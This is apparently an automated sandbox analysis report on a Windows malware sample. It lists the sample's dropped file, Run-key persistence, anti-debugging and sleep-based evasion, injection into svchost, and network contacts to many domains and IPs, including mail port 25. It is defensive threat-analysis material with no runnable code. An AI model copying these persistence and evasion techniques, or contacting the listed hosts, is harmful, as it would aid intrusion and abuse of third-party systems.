              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: OWd39WUX3D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
              Source: OWd39WUX3D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: OWd39WUX3D.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: OWd39WUX3D.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: OWd39WUX3D.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: OWd39WUX3D.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: OWd39WUX3D.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120D806 push ecx; ret 1_2_0120D819
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00598E1A push ecx; retf 1_2_00598E2C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_04009D2D push ecx; ret 11_2_04009D40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_04000E0A push ebp; ret 11_2_04000E0B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408B08C push es; iretd 11_2_0408B09A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408B0CB push 7240BFEDh; ret 11_2_0408B0D2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408A9BB push E44F2B70h; ret 11_2_0408AA63
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408AA04 push E44F2B70h; ret 11_2_0408AA63
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408B378 push eax; ret 11_2_0408B389
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408B3D9 pushfd ; ret 11_2_0408B3E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_04004546 push eax; ret 14_2_0400455C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_0400428B push es; iretd 14_2_04004299
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_04004596 push eax; ret 14_2_0400455C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_04004596 pushfd ; ret 14_2_040045AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_040042C6 push 7240BFEDh; ret 14_2_040042CD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13158B29 push FFFFFFBBh; retf 14_2_13158B2B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_131597F3 push ss; iretd 14_2_131597FE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13158E94 push cs; ret 14_2_13158E97
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13152561 push ecx; ret 14_2_13152574
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1315A460 push esi; iretd 14_2_1315A46A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13159CFF push ebp; iretd 14_2_13159D04
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1315873D push es; ret 15_2_1315874C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13159767 push edx; retf 15_2_13159768
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13158E1E push es; iretd 15_2_13158E21
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13159D06 push ebx; retf 15_2_13159D07
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13152571 push ecx; ret 15_2_13152584
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13159DFD push esp; iretd 15_2_13159E07
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_13152571 push ecx; ret 16_2_13152584
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_13158B29 push FFFFFFBBh; retf 21_2_13158B2B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_13158E94 push cs; ret 21_2_13158E97
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_13148915 push es; ret 21_2_13148916
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,11_2_0408BF20

              Persistence and Installation Behavior

              barindex
              Source: Yara matchFile source: 1.2.pigalicapi.exe.5d0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.svchost.exe.4000000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.pigalicapi.exe.5d0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 11.2.svchost.exe.4000000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeFile created: C:\Users\user\pigalicapi.exeJump to dropped file
              Source: C:\Windows\SysWOW64\svchost.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\ParametersJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pigalicapiJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
              Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_14-10297
              Source: C:\Windows\SysWOW64\svchost.exeStalling execution: Execution stalls by calling Sleep
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: \Device\Afd\Endpoint count: 31208
              Source: C:\Users\user\pigalicapi.exeCode function: EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_005D3B00
              Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-11831
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1314E01214_2_1314E012
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1314E02215_2_1314E022
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1314E02216_2_1314E022
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314E01221_2_1314E012
              Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_14-10764
              Source: C:\Users\user\Desktop\OWd39WUX3D.exe TID: 7108Thread sleep time: -55000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exe TID: 5720Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\OWd39WUX3D.exe TID: 7084Thread sleep time: -43200000s >= -30000sJump to behavior
              Source: C:\Users\user\pigalicapi.exe TID: 1300Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Users\user\pigalicapi.exe TID: 6496Thread sleep time: -45000s >= -30000sJump to behavior
              Source: C:\Users\user\pigalicapi.exe TID: 6728Thread sleep time: -43200000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 3368Thread sleep count: 170 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4084Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4084Thread sleep time: -155000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4788Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6604Thread sleep count: 1416 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6628Thread sleep count: 1252 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 3004Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6532Thread sleep count: 1604 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6592Thread sleep count: 1590 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 1292Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6676Thread sleep count: 660 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6700Thread sleep count: 682 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 4068Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 6084Thread sleep count: 194 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23076Thread sleep time: -75000s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23072Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23084Thread sleep count: 32 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23240Thread sleep count: 35 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23184Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23200Thread sleep count: 35 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23336Thread sleep count: 41 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23320Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23332Thread sleep count: 55 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23488Thread sleep count: 31 > 30
              Source: C:\Windows\SysWOW64\svchost.exe TID: 23480Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\svchost.exe TID: 24036Thread sleep count: 75 > 30
              Source: C:\Users\user\pigalicapi.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-12259
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,1_2_005D1CA0
              Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1416Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1252Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1604Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 1590Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 660
              Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 682
              Source: C:\Users\user\pigalicapi.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-11961
              Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 3.2 %
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1314E01221_2_1314E012
              Source: C:\Users\user\pigalicapi.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-12239
              Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_14-10562
              Source: C:\Users\user\pigalicapi.exeCode function: GetAdaptersInfo,1_2_005D9F70
              Source: C:\Users\user\pigalicapi.exeThread delayed: delay time: 21600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_1-11850
              Source: C:\Users\user\pigalicapi.exeAPI call chain: ExitProcess graph end nodegraph_1-11591
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_11-17564
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_11-17696
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_11-17570
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_14-10139
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end nodegraph_14-12445
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: OWd39WUX3D.exe, 00000000.00000003.482722234.0000000006B32000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\OWd39WUX3D.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D8F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,1_2_005D8F80
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120F6EF FindFirstFileExW,1_2_0120F6EF
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D1CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,1_2_005D1CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0408BF20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,11_2_0408BF20
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D3090 mov eax, dword ptr fs:[00000030h]1_2_005D3090
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005DEF90 mov eax, dword ptr fs:[00000030h]1_2_005DEF90
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120BBE3 mov eax, dword ptr fs:[00000030h]1_2_0120BBE3
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_00596000 mov eax, dword ptr fs:[00000030h]1_2_00596000
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_00401005 mov eax, dword ptr fs:[00000030h]11_2_00401005
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_04001A30 mov eax, dword ptr fs:[00000030h]11_2_04001A30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_04001900 mov eax, dword ptr fs:[00000030h]14_2_04001900
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120D5CA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0120D5CA
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D97C0 GetProcessHeap,RtlFreeHeap,1_2_005D97C0
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_005D3B00 EntryPoint,GetModuleFileNameA,SetUnhandledExceptionFilter,CoInitialize,StrStrIA,WSAStartup,VirtualFree,Sleep,ExitProcess,1_2_005D3B00
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120D75C SetUnhandledExceptionFilter,1_2_0120D75C
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120D5CA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0120D5CA
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_0120D8AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0120D8AC
              Source: C:\Users\user\pigalicapi.exeCode function: 1_2_012096F7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_012096F7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_1315634B SetUnhandledExceptionFilter,14_2_1315634B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13152265 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_13152265
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 14_2_13152925 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_13152925
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_1315635B SetUnhandledExceptionFilter,15_2_1315635B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13152275 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_13152275
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_13152935 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_13152935
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1315635B SetUnhandledExceptionFilter,16_2_1315635B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_1315537F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_1315537F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_13152275 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_13152275
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_13152935 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_13152935
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_1315634B SetUnhandledExceptionFilter,21_2_1315634B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_13152265 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_13152265
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 21_2_13152925 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_13152925

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.252.159.165 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.tyrns.com
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.26.121 25Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.73.229 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.179.184.212 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.89.126 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.12.155.123 25
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 80
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.nqks.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
              Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.13.244 80
